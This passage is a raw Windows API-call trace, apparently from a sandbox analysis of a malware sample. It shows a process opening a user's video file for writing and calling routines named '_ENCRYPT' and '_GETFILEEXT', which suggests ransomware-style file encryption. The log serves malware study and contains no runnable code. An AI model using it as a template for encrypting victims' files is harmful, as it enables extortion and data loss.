HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\23efg7fei5t7rrlh_.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0042.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0042.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0042.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0042.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=74, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0042.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x94) returned 0x7c5448 [0042.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=74, lpWideCharStr=0x7c5448, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi") returned 74 [0042.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0042.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0042.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0042.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0042.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0042.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0042.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0042.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0042.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0042.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0042.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0042.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0042.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0042.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0042.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0042.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0042.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0042.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0042.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0042.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0042.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0042.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0042.800] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0042.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.801] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0042.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0042.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0042.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0042.802] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0042.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0042.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0042.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0042.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0042.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0042.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0042.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0042.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0042.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0042.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0042.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0042.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0042.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.803] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0042.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0042.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0042.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0042.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0042.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0042.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.803] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897c0 [0042.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8897c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0042.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0042.804] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0042.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0042.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0042.804] CloseHandle (hObject=0x140) returned 1 [0042.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0042.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0042.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.804] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0042.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0042.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0042.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0042.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0042.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0042.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0042.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0042.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.805] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0042.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0042.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0042.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.805] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.805] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0042.805] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.805] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0042.806] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0042.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.806] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.806] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.806] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.806] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7389b590, ftCreationTime.dwHighDateTime=0x1d5bd91, ftLastAccessTime.dwLowDateTime=0x65634260, ftLastAccessTime.dwHighDateTime=0x1d5b6d9, ftLastWriteTime.dwLowDateTime=0x65634260, ftLastWriteTime.dwHighDateTime=0x1d5b6d9, nFileSizeHigh=0x0, nFileSizeLow=0x10898, dwReserved0=0x0, dwReserved1=0x777648, cFileName="23efG7fei5t7RrlH_.avi", cAlternateFileName="23EFG7~1.AVI")) returned 0x7c20c0 [0042.806] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.806] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.806] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7389b590, 